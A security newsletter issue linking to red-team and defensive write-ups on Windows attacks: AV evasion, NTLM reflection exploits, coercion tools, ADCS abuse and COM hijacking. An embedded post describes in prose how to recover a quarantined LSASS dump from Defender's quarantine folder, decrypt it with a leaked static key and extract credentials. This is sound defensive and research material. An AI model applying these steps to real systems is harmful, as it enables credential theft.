AppSec Ezine - 592nd https://pathonproject.com/zb/?fc916f3ce2c94d73#BSkiwWtmolrPqTOC7ADUoqPgyFp+WDI22jnz6PEZHx8= #AppSec #Security

Administrator Protection Review https://specterops.io/blog/2025/06/18/administrator-protection/

Chisel Client: From 16/65 to 1/65 flagged on VirusTotal https://jadu101.github.io/RedTeam/AV-Evasion/AV-Evasion-with-Chisel

I successfully tested a LSASS dumping technique on a Windows 10 lab machine, which we encountered on a recent Incident Response engagement (no EDR, default Defender installed).

The "MiniDumpWriteDump" technique, as described here [1], was successful in writing the LSASS process to disk.

However, as soon as I tried to copy the dump to my Kali machine, Defender jumped into action, prohibited access to the LSASS dump, and removed the file to the quarantine. And here is the catch.

I browsed to the following folder:
C:\ProgramData\Microsoft\Windows Defender\Quarantine

In the ResourceData folder, you will find different sub-folders (or not, if Defender never quarantined something on that host), each folder containing a quarantine file.

The files are encrypted with a static key that leaked years ago, and this 10-year-old code snippet is still sufficient to decrypt the files back to their original state. [2]

Long story short: I copied the encrypted file to my Kali machine, decrypted it using the Python code from [2], and extracted the credentials and hashes with pypykatz. [3]

Classic example of "No, it's not enough when your AV blocked or removed a threat". As you can see, an attacker can easily get the LSASS dump, even if Defender removed it from the disk ¯\_(ツ)_/¯

[1 ]https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
[2] https://raw.githubusercontent.com/malmoeb/DFIR/refs/heads/master/quarantine.py
[3] https://github.com/skelsec/pypykatz

And this is our pull request to NetExec which adds efsr_spray which can re-enable EFSR/PetitPotam on up-to-date Windows 11 hosts 🤯 if they have a writeable share:

https://github.com/Pennyw0rth/NetExec/pull/718

Introducing the BloodHound Query Library https://specterops.io/blog/2025/06/17/introducing-the-bloodhound-query-library/

A solid, back-to-basics overview of lateral movement from @huntress:

https://www.huntress.com/blog/how-huntress-addresses-lateral-movement

PoC Exploit for the NTLM reflection SMB flaw https://github.com/mverschu/CVE-2025-33073

“Localhost tracking” explained. It could cost Meta 32 billion. https://www.zeropartydata.es/p/localhost-tracking-explained-it-could

Based on our testing, MS seems to have fixed CVE-2025-33073 by blocking the CredUnmarshalTargetInfo/CREDENTIAL_TARGET_INFORMATIONW trick!
@tiraniddo ‪@decoder_it #netsec #infosec #windows #cybersecurity

https://mastodon.social/@RedTeamPentesting/114663688487284108

wspcoerce coerces a Windows computer account via SMB to an arbitrary target using MS-WSP https://github.com/RedTeamPentesting/wspcoerce

NTLM reflection is dead, long live NTLM reflection! – An in-depth analysis of CVE-2025-33073 https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

Getting RCE on Monero forums with wrapwrap https://swap.gs/posts/monero-forums/

Win Free Access to the PT1 Certification https://docs.google.com/forms/d/e/1FAIpQLSfteKn7mdw9_Ov3gQZkqYAsX3MxWT8NPxgU-5S51Jsp3jwZPg/viewform

This post describes how COM hijacking enables attackers to persist by loading malicious code through trusted Windows applications like Chrome🕵️‍♂️

https://specterops.io/blog/2025/05/28/revisiting-com-hijacking

#infosec #cybersecurity #pentest #redteam #windows

I just pwned TombWatcher on Hack The Box! https://www.hackthebox.com/achievement/machine/52014/664 #HackTheBox

Surprise surprise, 5 minutes of reading Cloudflare's AI-generated OAuth provider shows that it was not, in fact, "thoroughly reviewed and cross-referenced with relevant RFCs, by security experts with previous experience with those RFCs"

https://github.com/cloudflare/workers-oauth-provider/issues/41

Breaking ADCS: ESC1 to ESC16 Attack Techniques https://xbz0n.sh/blog/adcs-complete-attack-reference

"NO CGI" is really just INVISIBLE CGI (5/5) https://www.youtube.com/watch?v=hniWOH_zwh8